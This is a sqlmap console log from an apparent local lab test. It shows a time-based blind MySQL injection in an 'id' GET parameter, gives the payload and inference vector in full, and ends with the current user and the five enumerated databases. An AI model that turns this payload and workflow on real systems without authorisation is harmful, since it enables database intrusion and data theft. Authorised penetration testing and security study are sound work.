         _
 ___ ___| |_____ ___ ___  {1.0-dev-80b9fc4}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:22:28

[12:22:28] [DEBUG] cleaning up configuration parameters
[12:22:28] [INFO] setting file for logging HTTP traffic
[12:22:28] [DEBUG] setting the HTTP timeout
[12:22:28] [DEBUG] setting the HTTP method to GET
[12:22:28] [DEBUG] creating HTTP requests opener object
[12:22:28] [INFO] resuming back-end DBMS 'mysql' 
[12:22:28] [INFO] testing connection to the target URL
[12:22:28] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=70' AND SLEEP(5) AND 'rdzp'='rdzp&mus_id=2
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[12:22:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10, PHP 5.5.12
back-end DBMS: MySQL 5.0.11
[12:22:28] [INFO] testing if current user is DBA
[12:22:28] [INFO] fetching current user
[12:22:28] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[12:22:28] [INFO] retrieved: [12:22:28] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[12:22:34] [DEBUG] used the default behaviour, running in batch mode
[12:22:34] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[12:22:44] [INFO] adjusting time delay to 1 second due to good response times
thanos@localhost
[12:23:52] [DEBUG] performed 135 queries in 84.10 seconds
current user is DBA:    False
[12:23:53] [INFO] fetching database names
[12:23:53] [INFO] fetching number of databases
[12:23:53] [INFO] retrieved: 5
[12:23:55] [DEBUG] performed 8 queries in 2.08 seconds
[12:23:55] [INFO] retrieved: information_schema
[12:25:07] [DEBUG] performed 151 queries in 71.96 seconds
[12:25:07] [INFO] retrieved: conservatory
[12:25:56] [DEBUG] performed 103 queries in 49.68 seconds
[12:25:56] [INFO] retrieved: mysql
[12:26:17] [DEBUG] performed 47 queries in 20.32 seconds
[12:26:17] [INFO] retrieved: performance_schema
[12:27:27] [DEBUG] performed 151 queries in 69.99 seconds
[12:27:27] [INFO] retrieved: phpmyadmin
[12:28:10] [DEBUG] performed 87 queries in 43.55 seconds
available databases [5]:
[*] conservatory
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin

[12:28:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'

[*] shutting down at 12:28:10

